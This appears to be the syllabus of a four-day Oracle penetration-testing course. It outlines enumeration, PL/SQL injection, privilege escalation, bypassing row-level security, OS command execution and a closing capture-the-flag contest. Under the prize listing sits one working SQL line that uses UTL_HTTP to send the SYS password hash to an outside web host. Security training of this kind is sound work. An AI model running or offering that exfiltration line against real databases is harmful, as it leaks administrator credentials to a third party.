Penetration Testing: Advanced Oracle Exploitation




Course Index:

Day 1 Oracle RDBMS and the Oracle Network Architecture
  » Introduction and Oracle Review
  » Service Information Enumeration
  » First Avenues of Attack
  Day 1: Summary

Day 2 Attack Overview
  » Auditing PLSQL Code
  » Attacking through PL/SQL
  » Real World Scenario: Exploiting DBMS_CDC_IMPDP
  Day 2: Summary

Day 3 Attack Advancement
  » Privilege Escalation
  » Advanced Techniques
  » Defeating Virtual Private Databases
  Day 3: Summary

Day 4 Advanced Techniques
  » Attacking PL/SQL Through WebAPPs
  » Running Operating System Commands
  » Using Oracle Network Capability
  Day 4: Summary

FINAL ACTIVITY: ORACLE SQL WARGAMES

Day 1 Oracle RDBMS and the Oracle Network Architecture

» Introduction and Oracle Review
    Processes
      o The student will understand Oracle processes and permissions.
    The File System
      o The student will understand how Oracle interacts with the filesystem.
    The Network
      o The student will learn about Oracle's network capability from an infrastructural perspective.

» Service Information Enumeration:
    The TNS Protocol
      o The student will review the TNS protocol and how it is utilized by Oracle.
    Enumerating Oracle Network Information
      o Listener Version and Status Commands
      o Using the TNS Protocol Version
      o Using the XML Database Version
      o Using Error Text
      o Using the TTC Function

» First Avenues of Attack:
    Attacking the TNS Listener and Dispatchers
      o Aurora GIOP Server
      o XML Database
    Attacking the Authentication Process
      o Oracle Crypto Overview
      o Default Login Values
      o Account Enumeration and Brute Force

Day 1: Summary:

Day one starts off with a brief overview of the Oracle RDBMS and how it interacts with the operating system it resides on. The student will gain an overview of the process, file, and network capability built into Oracle. Then the student will immediately be shown how to enumerate data about the Oracle version, and begin attacking a live Oracle test-production server.

Day 2 Attack Overview

» Auditing PLSQL Code
    Dangerous Functionality, exploring PLSQL Syntax
    Understanding where PL/SQL lives in the Network Stack
    Examining Code for Interesting Problems

» Attacking through PL/SQL
    Understanding PL/SQL Execution Privileges
    Oracle PL/SQL Wrapping
    PL/SQL Injection Flaw Reconnaissance
    API Hijacking in Relation to SQL Injection
    Race Conditions

» Real World Scenario: Exploiting DBMS_CDC_IMPDP
    Understanding PL/SQL Execution Privileges
    Oracle PL/SQL Wrapping
    Direct PL/SQL Injection Example

Day 2: Summary:

PL/SQL is a programming language for Oracle database servers. The PL in the acronym stands for Procedural Language, a fully featured programming language with built-in SQL capabilities and database objects such as packages, procedures, functions, triggers, and types, all written in PL/SQL. Because so many Oracle security issues relate in some way to PL/SQL, it is crucial for the Oracle security expert to understand PL/SQL. Day 2 explores PL/SQL in depth as a mechanism for attack against Oracle servers. The student will explore injection theory and reconnaissance against SQL servers and how to inject into queries through process defenses. Additionally, the student will learn to identify critical weak spots in the Oracle PL/SQL language and will, in a hands-on scenario, exploit DBMS_CDC_IMPDP.

Day 3 Attack Advancement

» Privilege Escalation
    The student will learn to gain DBA privileges using:
      o DBA from CREATE ANY TRIGGER
      o DBA from CREATE ANY VIEW
      o DBA from CREATE PROCEDURE

» Advanced Techniques
    Exploiting Virtual Private Databases
    Oracle Confusion: Tricks to Access Policies

» Defeating Virtual Private Databases
    Defeating VPDs using File Access
    Tricking Oracle into Dropping a Policy
    Exploiting General Privileges

Day 3: Summary:

A VPD is a security mechanism built into Oracle that allows fine-grained access control, or row-level security. There are a number of ways of defeating VPD. This day will start off with the student investigating some of these methods. The student will also examine how some privileges can be abused to gain DBA privileges. Continuing from the last section, we'll look at the CREATE ANY TRIGGER privilege and how it can be used to elevate privileges. Additionally, the student will be exposed to the dangers of many of the CREATE ANY privileges, which typically can be leveraged to elevate an injection into DBA privileges. The student will also be exposed to the advanced methods used to gather policy information from the server utilizing custom exploitation methods.

Day 4 Advanced Techniques

» Attacking PL/SQL Through WebAPPs
    Recognizing the Oracle PL/SQL Gateway
    Verifying the Existence of the PL/SQL Gateway
    Attacking the Gateway

» Running Operating System Commands
    Commands through Java
    Commands through the DBMS Scheduler
    Commands through the Job Scheduler
    Commands utilizing ALTER SYSTEM

» Using Oracle Network Capability
    About UTL_TCP and UTL_HTTP
    Encrypting Data Prior to Extraction
    Attacking other Systems on the Network
    Java and the Network
    Database Links

Day 4: Summary:

The Oracle PL/SQL Gateway provides the capability to execute PL/SQL procedures in an Oracle database server via the web. It provides a gateway, a seamless path from the Internet, into a backend Oracle database server over the web. On Day 4 the student will learn the attack methods used to exploit the PL/SQL gateway, using cumulative learning from the previous 3 days and newly introduced techniques. Additionally, the student will be exposed to a number of facilities for running operating system commands from the database server, some intentional and others "hacks." Commands can be executed in a variety of ways; by the end of the day the student will be able to attack and execute commands on the database with newly acquired techniques. The UTL_FILE package enables Oracle users to read and write to the file system. As already noted, access to files on the file system is achieved with the privileges of the Oracle user, so anything this user can read or write to can be read or written to by anyone else.

FINAL ACTIVITY: ORACLE SQL WARGAMES

The student will use applied learning from this course to compete against other participants in a capture-the-flag tournament. Everyone gets the same image; the contest is to configure and secure your own image, and to attack and take over the opponent host before the competition, using the applied learning available in this course.

Goal: Capture the most flags from network users and disable remote user retaliation.

Pen-Test Winners Prize:

» Grayscale Custom Oracle Hackers T-Shirt

    select utl_http.request('http://grayscale-research.org:8080/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;

» Free 1 Year License for Grayscale's Web-Auditors Toolkit